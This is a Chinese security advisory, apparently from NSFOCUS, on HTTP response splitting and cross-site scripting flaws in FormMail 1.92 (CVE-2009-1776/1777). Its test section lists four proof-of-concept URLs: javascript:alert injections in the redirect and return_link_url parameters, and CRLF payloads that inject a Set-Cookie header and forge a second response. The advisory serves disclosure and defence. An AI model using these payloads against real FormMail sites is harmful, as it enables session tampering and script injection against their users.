安全研究

安全漏洞
FormMail HTTP响应拆分和跨站脚本漏洞

发布日期:2009-05-12
更新日期:2009-05-14

受影响系统:
Matt Wright FormMail 1.92
描述:
BUGTRAQ  ID: 34929
CVE(CAN) ID: CVE-2009-1776,CVE-2009-1777

FormMail是一款用perl实现的基于WEB的邮件网关,可以运行于大多数Linux/Unix以及Windows等多种系统平台。

FormMail.pl模块没有正确地验证用户所提交的request和return_link_url参数,远程攻击者可以通过提交恶意请求执行跨站脚本攻击,或在返回给用户的响应中包含任意HTTP头。

<*来源:Francesco Ongaro (ascii@ush.it
  
  链接:http://secunia.com/advisories/35068/
        http://marc.info/?l=bugtraq&m=124214294303546&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

foobar@example.com&amp;subject=1&amp;redirect=javascript:alert(%27USH%27);" target="_blank">http://www.example.com/FormMail.pl?recipient=foobar@example.com&amp;subject=1&amp;redirect=javascript:alert(%27USH%27);
foobar@example.com&amp;subject=1&amp;return_link_url=javascript:alert(%27USH%27);&amp;return_link_title=USH" target="_blank">http://www.example.com/FormMail.pl?recipient=foobar@example.com&amp;subject=1&amp;return_link_url=javascript:alert(%27USH%27);&amp;return_link_title=USH
foobar@example.com&amp;subject=1&amp;redirect=http://www.example.com%0D%0aSet-Cookie:auth%3DUSH;vuln%3DHTTPHeaderInjection;" target="_blank">http://www.example.com/FormMail.pl?recipient=foobar@example.com&amp;subject=1&amp;redirect=http://www.example.com%0D%0aSet-Cookie:auth%3DUSH;vuln%3DHTTPHeaderInjection;
foobar@example.com&amp;subject=1&amp;redirect=http://www.example.com%0D%0A%0FContent-Length:%200%0D%0AContent-Type:%20text/plain%0D%0AStatus:302%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text/plain%0D%0Ahttp://www.example.com" target="_blank">http://www.example.com/FormMail.pl?recipient=foobar@example.com&amp;subject=1&amp;redirect=http://www.example.com%0D%0A%0FContent-Length:%200%0D%0AContent-Type:%20text/plain%0D%0AStatus:302%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text/plain%0D%0Ahttp://www.example.com

建议:
厂商补丁:

Matt Wright
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://worldwidemart[dot]com/

浏览次数:2465
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障